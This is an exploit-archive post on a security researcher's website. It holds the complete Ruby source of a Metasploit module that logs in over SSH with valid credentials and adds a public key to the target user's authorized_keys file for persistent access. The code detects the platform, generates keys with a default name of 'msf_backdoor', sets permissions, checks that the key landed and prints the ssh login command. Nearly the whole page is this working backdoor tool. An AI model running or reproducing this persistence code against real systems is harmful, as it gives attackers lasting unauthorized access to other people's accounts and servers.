Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

OpenSSH 10.2p1 Authorized Keys Persistence Tool
OpenSSH 10.2p1 Authorized Keys Persistence Tool
OpenSSH 10.2p1 Authorized Keys Persistence Tool

=============================================================================================================================================
| # Title OpenSSH 10.2p1 Authorized Keys Persistence Tool

=============================================================================================================================================
| # Title : OpenSSH 10.2p1 Authorized Keys Persistence via Valid Credentials |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssh.com/ |
=============================================================================================================================================

[+] References :

[+] Summary : This Metasploit Auxiliary module establishes persistent access to remote systems by adding an SSH public key to a target user?s authorized_keys file after successful authentication.
The module requires valid SSH credentials (password or private key) and supports both Unix-like and Windows SSH environments.
It automatically detects the target platform, locates the appropriate authorized_keys file, safely deploys the key using atomic operations, enforces correct permissions, and optionally verifies persistence.
This technique aligns with MITRE ATT&CK T1098.004 (Account Manipulation: SSH Authorized Keys) and represents a post-authentication persistence mechanism, not an exploit

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'SSH Authorized Keys Persistence',
'Description' => %q{
This module adds SSH public keys to authorized_keys files on remote
SSH servers to establish persistent access.

The module requires valid SSH credentials (password or private key)
and will add the specified public key to the target user's
authorized_keys file.

This is a persistence technique, not an exploit.
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'References' => [
['URL', 'https://attack.mitre.org/techniques/T1098/004/'],
['URL', 'https://www.ssh.com/academy/ssh/authorized_keys']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
}
)
)

register_options([
Opt::RPORT(22),
OptString.new('USERNAME', [true, 'Username to authenticate with']),
OptString.new('PASSWORD', [false, 'Password for authentication']),
OptPath.new('SSH_PRIVATE_KEY', [false, 'SSH private key for authentication']),
OptBool.new('GENERATE_KEYS', [false, 'Generate new SSH keys for persistence', true]),
OptString.new('KEY_NAME', [false, 'Name for generated keys', 'msf_backdoor']),
OptBool.new('VERIFY_PERSISTENCE', [false, 'Verify persistence after deployment', true]),
OptString.new('CUSTOM_KEY', [false, 'Custom public key to deploy'])
])

register_advanced_options([
OptInt.new('SSH_TIMEOUT', [false, 'SSH connection timeout', 30]),
OptBool.new('ACCEPT_HOSTKEY', [false, 'Accept unknown SSH host keys', false])
])
end

def run

@results = {
generated_keys: {},
deployed_keys: [],
errors: []
}

print_status("Starting SSH Key Persistence against #{rhost}:#{rport}")

begin

public_key = setup_persistence_keys
if public_key.nil?
print_error("Failed to setup persistence keys")
return
end

success = deploy_key_to_user(public_key)

if success
print_good("Persistence successfully established")
else
print_error("Failed to establish persistence")
end
generate_report

rescue ::Timeout::Error
print_error("Connection timed out")
rescue ::Net::SSH::Exception => e
print_error("SSH Error: #{e.class} - #{e.message}")
rescue ::Exception => e
print_error("Module failed: #{e.class} - #{e.message}")
print_error("Backtrace: #{e.backtrace.join("\n")}") if datastore['VERBOSE']
end
end

def check
print_status("Checking SSH service on #{rhost}:#{rport}")

begin

test_username = Rex::Text.rand_text_alpha(8)

ssh_opts = {
'RHOST' => rhost,
'RPORT' => rport,
'USERNAME' => test_username,
'PASSWORD' => Rex::Text.rand_text_alphanumeric(16),
'SSH_TIMEOUT' => 10,
'VERBOSE' => false
}

if datastore['ACCEPT_HOSTKEY']
ssh_opts['VERIFY_HOST_KEY'] = :never
end

ssh = connect_ssh(false, ssh_opts)

if ssh
ssh.close
print_good("SSH service is accessible and accepts connections")
return Exploit::CheckCode::Appears
else

print_warning("SSH service responded but authentication failed")
return Exploit::CheckCode::Appears
end

rescue Net::SSH::AuthenticationFailed
print_good("SSH service accepts connections (authentication failed as expected)")
return Exploit::CheckCode::Appears
rescue Net::SSH::ConnectionTimeout
print_error("SSH connection timeout")
return Exploit::CheckCode::Safe
rescue Net::SSH::Disconnect => e
print_warning("SSH disconnected: #{e.message}")
return Exploit::CheckCode::Unknown
rescue => e
vprint_error("SSH check error: #{e.class} - #{e.message}")
return Exploit::CheckCode::Unknown
end
end

def setup_persistence_keys
if datastore['CUSTOM_KEY'] && !datastore['CUSTOM_KEY'].empty?
return validate_and_load_custom_key(datastore['CUSTOM_KEY'])
elsif datastore['GENERATE_KEYS']
return generate_exploit_keys
elsif datastore['SSH_PRIVATE_KEY'] && File.exist?(datastore['SSH_PRIVATE_KEY'])
return extract_public_key_from_private(datastore['SSH_PRIVATE_KEY'])
else
print_error("No key source specified. Use GENERATE_KEYS, CUSTOM_KEY, or SSH_PRIVATE_KEY")
return nil
end
end

def generate_exploit_keys
print_status("Generating persistence keypair")

begin
require 'sshkey'

sshkey = SSHKey.generate(
type: 'RSA',
bits: 4096,
comment: "msf_#{Time.now.to_i}"
)


loot_path = store_loot(
'ssh.private.key',
'text/plain',
rhost,
sshkey.private_key,
"#{datastore['KEY_NAME']}.pem",
'SSH Private Key'
)

store_loot(
'ssh.public.key',
'text/plain',
rhost,
sshkey.ssh_public_key,
"#{datastore['KEY_NAME']}.pub",
'SSH Public Key'
)

cred_data = {
origin_type: :service,
address: rhost,
port: rport,
service_name: 'ssh',
private_type: :ssh_key,
private_data: sshkey.private_key,
username: datastore['USERNAME'],
workspace_id: myworkspace_id
}
create_credential(cred_data)

@results[:generated_keys] = {
private_key_path: loot_path,
public_key: sshkey.ssh_public_key,
fingerprint: sshkey.fingerprint
}

print_good("Generated persistence keypair")
print_good(" Private key: #{loot_path}")
print_good(" Fingerprint: #{sshkey.fingerprint}")

return sshkey.ssh_public_key

rescue => e
print_error("Failed to generate keys: #{e.message}")
return nil
end
end

def validate_and_load_custom_key(key_string)
unless key_string.strip =~ /^ssh-(rsa|dss|ed25519|ecdsa-sha2-nistp(256|384|521)) /
print_error("Invalid SSH public key format")
return nil
end

print_status("Using custom public key")
return key_string.strip
end

def extract_public_key_from_private(private_key_path)
begin
require 'sshkey'
private_key = File.read(private_key_path)
sshkey = SSHKey.new(private_key)
print_status("Extracted public key from private key")
return sshkey.ssh_public_key
rescue => e
print_error("Failed to extract public key: #{e.message}")
return nil
end
end

def deploy_key_to_user(public_key)
username = datastore['USERNAME']
password = datastore['PASSWORD']
ssh_key = datastore['SSH_PRIVATE_KEY']

print_status("Deploying persistence key for #{username}")

ssh = establish_ssh_connection(username, password, ssh_key)
return false unless ssh

begin

platform = detect_platform(ssh)
print_status("Detected platform: #{platform}")

auth_keys_path = get_auth_keys_path(username, platform, ssh)
return false unless auth_keys_path

print_status("Target authorized_keys file: #{auth_keys_path}")

success = deploy_key_atomically(ssh, auth_keys_path, public_key, username, platform)

if success
print_good("Key deployed to #{auth_keys_path}")

@results[:deployed_keys] << {
username: username,
path: auth_keys_path,
platform: platform,
timestamp: Time.now.to_s
}

return true
else
print_error("Failed to deploy key")
return false
end

ensure
ssh.close if ssh
end
end

def establish_ssh_connection(username, password, ssh_key)

ssh_opts = {
'RHOST' => rhost,
'RPORT' => rport,
'USERNAME' => username,
'SSH_TIMEOUT' => datastore['SSH_TIMEOUT'],
'VERBOSE' => false
}

if datastore['ACCEPT_HOSTKEY']
ssh_opts['VERIFY_HOST_KEY'] = :never
end

if ssh_key && File.exist?(ssh_key)
ssh_opts['KEY_FILE'] = ssh_key
elsif password
ssh_opts['PASSWORD'] = password
else
print_error("No authentication method specified")
return nil
end

ssh = connect_ssh(true, ssh_opts)

if ssh

begin

channel_test = ssh.open_channel do |ch|
ch.exec "true"
ch.on_request("exit-status") do |ch2, data|

print_good("SSH connection established and active")
end
end

ssh.loop(0.1)

return ssh
rescue => e
vprint_error("Channel test failed: #{e.message}")

print_good("SSH connection established (channel test optional)")
return ssh
end
else
print_error("Failed to establish SSH connection")
return nil
end

rescue Net::SSH::AuthenticationFailed
print_error("Authentication failed for #{username}")
return nil
rescue Net::SSH::ConnectionTimeout
print_error("Connection timeout for #{username}")
return nil
rescue Net::SSH::HostKeyMismatch => e
print_error("Host key mismatch: #{e.fingerprint}")
print_error("Set ACCEPT_HOSTKEY to true to accept unknown host keys")
return nil
rescue => e
print_error("SSH connection error: #{e.message}")
return nil
end
end

def detect_platform(ssh)

unix_indicators = [

"which bash 2>/dev/null",
"test -d /usr && echo UNIX",
"test -d /etc && echo UNIX",
"ls /proc 2>/dev/null && echo UNIX",
"uname -s 2>/dev/null"
]

unix_indicators.each do |cmd|
result = ssh.exec!(cmd)
if result && result.include?('UNIX')
return :unix
elsif result && !result.strip.empty? && cmd.include?('uname')

return :unix
end
end

windows_indicators = [
"cmd /c \"if exist C:\\Windows\\System32 echo WINDOWS\"",
"powershell -Command \"if (Test-Path 'C:\\Windows') { Write-Output 'WINDOWS' }\" 2>$null",
"wmic os get caption 2>nul | findstr /i windows"
]

windows_indicators.each do |cmd|
result = ssh.exec!(cmd)
if result && result.include?('WINDOWS')
return :windows
end
end

cygwin_check = ssh.exec!("uname -o 2>/dev/null")
if cygwin_check
result_lower = cygwin_check.downcase.strip
if result_lower.include?('cygwin') || result_lower.include?('mingw')
return :windows_cygwin
end
end

print_warning("Could not detect platform, defaulting to Unix")
:unix
end

def get_auth_keys_path(username, platform, ssh)
case platform
when :windows, :windows_cygwin

locations = [

"C:/Users/#{username}/.ssh/authorized_keys",

"/home/#{username}/.ssh/authorized_keys",

"C:/ProgramData/ssh/administrators_authorized_keys"
]

locations.each do |path|
dir = File.dirname(path)
if ensure_directory_exists(ssh, dir, username, platform)
if path.include?('ProgramData')
print_warning("System authorized_keys location requires special permissions")
print_warning("SSH may ignore this file if ACLs are not correctly set")
end
return path
end
end

return "C:/Users/#{username}/.ssh/authorized_keys"

when :unix

home_cmds = [
"getent passwd #{username} 2>/dev/null | cut -d: -f6",
"eval echo ~#{username} 2>/dev/null",
"awk -F: -v user=#{username} '$1 == user {print $6}' /etc/passwd 2>/dev/null",
"perl -e '@u=getpwnam(\"#{username}\"); print \$u[7] if @u;' 2>/dev/null",
"python3 -c \"import pwd; print(pwd.getpwnam('#{username}').pw_dir)\" 2>/dev/null",
"python -c \"import pwd; print(pwd.getpwnam('#{username}').pw_dir)\" 2>/dev/null"
]

home_dir = nil
home_cmds.each do |cmd|
result = ssh.exec!(cmd)
if result && !result.strip.empty? && result.strip != "~#{username}"
home_dir = result.strip
break
end
end

if home_dir
return "#{home_dir}/.ssh/authorized_keys"
else

if username == 'root'
return '/root/.ssh/authorized_keys'
else
return "/home/#{username}/.ssh/authorized_keys"
end
end

else
print_error("Cannot determine authorized_keys path for platform: #{platform}")
return nil
end
end

def deploy_key_atomically(ssh, path, public_key, username, platform)
clean_key = public_key.strip

print_status("Deploying key to: #{path}")

dir = File.dirname(path)
unless ensure_directory_exists(ssh, dir, username, platform)
print_error("Failed to create directory for #{path}")
return false
end

if platform != :windows
ssh.exec!("umask 077 2>/dev/null")
end
if file_exists?(ssh, path, platform)
unless create_backup(ssh, path, platform)
print_warning("Failed to create backup")
end
end
existing_keys = []
if file_exists?(ssh, path, platform)
existing_keys = read_authorized_keys(ssh, path, platform)
end

existing_keys.each do |existing_key|
if existing_key.strip == clean_key
print_warning("Key already exists at #{path}")
return true
end
end

existing_keys << clean_key

success = write_authorized_keys_atomically(ssh, path, existing_keys, platform)

unless success
print_error("Failed to write keys to #{path}")
return false
end

unless set_file_permissions(ssh, path, username, platform)
print_warning("Failed to set permissions on #{path}")
end

if datastore['VERIFY_PERSISTENCE']
unless verify_key_deployment(ssh, path, clean_key, platform)
print_error("Verification failed: Key not found in #{path}")
return false
end
print_good("Verification successful: Key found in #{path}")
end

true
end

def read_authorized_keys(ssh, path, platform)
keys = []

if platform == :windows

cmd = "type \"#{path}\" 2>nul"
content = ssh.exec!(cmd)
if content
content.each_line do |line|
stripped = line.strip
keys << stripped unless stripped.empty? || stripped.start_with?('#')
end
end
else
cmd = "cat \"#{path}\" 2>/dev/null"
content = ssh.exec!(cmd)
if content
content.each_line do |line|
stripped = line.strip
keys << stripped unless stripped.empty? || stripped.start_with?('#')
end
end
end

keys
end

def write_authorized_keys_atomically(ssh, path, keys, platform)
if platform == :windows
temp_path = "#{path}.tmp#{rand(10000)}"

temp_content = keys.join("\n") + "\n"
escaped_content = temp_content.gsub('"', '\"')
methods = [
"powershell -Command \"'#{escaped_content.gsub("'", "''")}' | Out-File -FilePath '#{temp_path}' -Encoding UTF8 -Force 2>$null\"",
"echo #{escaped_content} > \"#{temp_path}\""
]

success = false
methods.each do |cmd|
ssh.exec!(cmd)
if file_exists?(ssh, temp_path, platform)
success = true
break
end
end

if success
cmd = "move /Y \"#{temp_path}\" \"#{path}\" >nul 2>&1"
ssh.exec!(cmd)
return file_exists?(ssh, path, platform)
end

return false
else

temp_path = "#{path}.tmp.#{rand(10000)}"
temp_content = keys.join("\n") + "\n"
escaped_content = temp_content.gsub("'", "'\"'\"'")
cmd = "printf '%s' '#{escaped_content}' > '#{temp_path}' 2>/dev/null"
ssh.exec!(cmd)
unless file_exists?(ssh, temp_path, platform)
return false
end
ssh.exec!("mv -f '#{temp_path}' '#{path}' 2>/dev/null")

return file_exists?(ssh, path, platform)
end
end

def file_exists?(ssh, path, platform)
if platform == :windows
cmd = "if exist \"#{path}\" (echo EXISTS) else (echo NOT_EXISTS)"
else
cmd = "test -f \"#{path}\" && echo EXISTS || echo NOT_EXISTS"
end

result = ssh.exec!(cmd)
result && result.strip == 'EXISTS'
end

def directory_exists?(ssh, path, platform)
if platform == :windows
cmd = "if exist \"#{path}\" (echo EXISTS) else (echo NOT_EXISTS)"
else
cmd = "test -d \"#{path}\" && echo EXISTS || echo NOT_EXISTS"
end

result = ssh.exec!(cmd)
result && result.strip == 'EXISTS'
end
def ensure_directory_exists(ssh, dir, username, platform)
return true if dir.empty? || dir == '.' || dir == '/'
return true if directory_exists?(ssh, dir, platform)
if platform == :windows
cmd = "mkdir \"#{dir}\" 2>nul"
else
cmd = "mkdir -p \"#{dir}\" 2>/dev/null"
end

ssh.exec!(cmd)

if directory_exists?(ssh, dir, platform)
if platform != :windows
ssh.exec!("chmod 700 \"#{dir}\" 2>/dev/null")
ssh.exec!("chown #{username} \"#{dir}\" 2>/dev/null || true")
end
return true
end

false
end
def create_backup(ssh, path, platform)
timestamp = Time.now.to_i
backup_path = "#{path}.backup_#{timestamp}"
if platform == :windows
cmd = "copy \"#{path}\" \"#{backup_path}\" >nul 2>&1"
else
cmd = "cp -p \"#{path}\" \"#{backup_path}\" 2>/dev/null"
end

ssh.exec!(cmd)

if file_exists?(ssh, backup_path, platform)
print_status("Created backup: #{backup_path}")
return true
else
print_warning("Backup creation failed")
return false
end
end
def set_file_permissions(ssh, path, username, platform)
if platform == :windows
remove_inherit = "icacls \"#{path}\" /inheritance:r 2>nul"
ssh.exec!(remove_inherit)
commands = [
"icacls \"#{path}\" /grant:r \"SYSTEM\":F 2>nul",
"icacls \"#{path}\" /grant:r \"*S-1-5-32-544\":F 2>nul" # Administrators group
]

commands << "icacls \"#{path}\" /grant:r \"#{username}\":F 2>nul"

commands.each do |cmd|
ssh.exec!(cmd)
end

return true
elsif platform == :windows_cygwin

ssh.exec!("chmod 600 \"#{path}\" 2>/dev/null")
return true
else
dir = File.dirname(path)

if dir != '.' && dir != '/'
ssh.exec!("chmod 700 \"#{dir}\" 2>/dev/null")
# Use chown without group for better compatibility
ssh.exec!("chown #{username} \"#{dir}\" 2>/dev/null || true")
end

ssh.exec!("chmod 600 \"#{path}\" 2>/dev/null")
ssh.exec!("chown #{username} \"#{path}\" 2>/dev/null || true")

return true
end
end

def verify_key_deployment(ssh, path, full_key, platform)
return false unless file_exists?(ssh, path, platform)

keys = read_authorized_keys(ssh, path, platform)

keys.each do |key|
return true if key.strip == full_key
end

false
end

def generate_report
return if @results[:deployed_keys].empty?

print_status("Generating persistence report")

report_data = {
module: self.name,
target: "#{rhost}:#{rport}",
timestamp: Time.now.to_s,
results: @results
}

begin
loot_path = store_loot(
'ssh.persistence.report',
'application/json',
rhost,
JSON.pretty_generate(report_data),
"ssh_persistence_#{rhost}_#{Time.now.to_i}.json",
'SSH Persistence Report'
)
print_good("Report saved: #{loot_path}")
rescue => e
print_error("Failed to save report: #{e.message}")
end

print_line("=" * 60)
print_status("PERSISTENCE ESTABLISHED")
print_line("=" * 60)

@results[:deployed_keys].each do |deployment|
print_good("User: #{deployment[:username]}")
print_good(" Key location: #{deployment[:path]}")
print_good(" Platform: #{deployment[:platform]}")

if @results[:generated_keys][:private_key_path]
print_good(" Access command:")
print_good(" ssh -i #{@results[:generated_keys][:private_key_path]} #{deployment[:username]}@#{rhost}")
end
end

print_line("=" * 60)
end
end

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
Social Media Share